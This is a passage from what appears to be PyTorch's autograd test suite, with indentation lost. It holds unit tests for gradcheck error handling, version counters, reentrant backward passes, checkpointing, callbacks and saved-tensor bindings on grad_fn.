self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when mkldnn inputs, forward mode testing is not allowed
# Update tolerances below to make sure the gradient match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while compute batched grad (print big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
def test_callback_adds_callback(self):
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
